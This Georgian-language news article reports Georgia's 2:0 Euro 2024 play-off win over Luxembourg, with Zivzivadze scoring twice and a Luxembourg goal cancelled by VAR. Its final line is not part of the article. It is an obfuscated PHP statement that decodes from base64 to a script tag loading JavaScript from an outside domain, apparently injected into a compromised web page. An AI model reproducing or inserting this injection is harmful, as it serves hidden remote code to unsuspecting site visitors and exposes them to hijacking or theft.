celsiusi
ავერსი საქკაბელი

პირველი რეალური საგოლე მომენტი მე-13 წუთზე გიორგი ჩაკვეტაძის გადაცემის შემდეგ შეიქმნა – კარში ბუდუ ზივზივაძემ დაარტყა, მაგრამ ბურთი ძელს მოხვდა და ლუქსემბურგის ნაკრები აშკარა გოლს გადარჩა. 21-ე წუთზე ზივზივაძემ მაინც გაიტანა, მაგრამ მეკარეზე თავდასხმა დაფიქსირდა და გოლი არ ჩაითვალა.

შესვენების შემდეგ ლუქსემბურგმა თამაშის გამოსწორება სცადა და თამაშში დაძაბულობამ იმატა, 52-ე წუთზე გიორგი მიქაუტაძის საჯარიმოში წაქცევისთვის ესპანელი არბიტრისგან ჩვენი გუნდი ჯარიმას ითხოვდა, მაგრამ მსაჯმა არ დანიშნა, სტუმრების კონტრშეტევა კი გერსონ როდრიგესმა შედეგიანი დარტყმით დააგვირგვინა. თუმცა, არბიტრმა მომენტი ვიდეორეფერიზე გადაამოწმა, ლუქსემბურგის გოლი გააუქმა, ხოლო სტუმართა მცველი მაქსიმ შანოტი ბოლო იმედის ჯარიმისთვის მოედნიდან გააძევა. შენგელიამ ჯარიმა სახიფათოდ დაარტყა და სტუმრები ძელმა გადაარჩინა.

64-ე წუთზე ჩაკვეტაძემ მარცხენა ფლანგზე შეტევა ლევან შენგელიას გაუგრძელა, რომლის გადაცემითაც კარის წინ გახსნილმა ზივზივაძემ დუბლი შეასრულა და ჩვენი გუნდის უპირატესობა ორამდე გაზარდა.

საქართველოს ნაკრებმა 2:0 გაიმარჯვა და წინ ევრო 2024-ის პლეი ოფის ფინალია.

ავტორი
სანდრო ჭითანავა
300
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");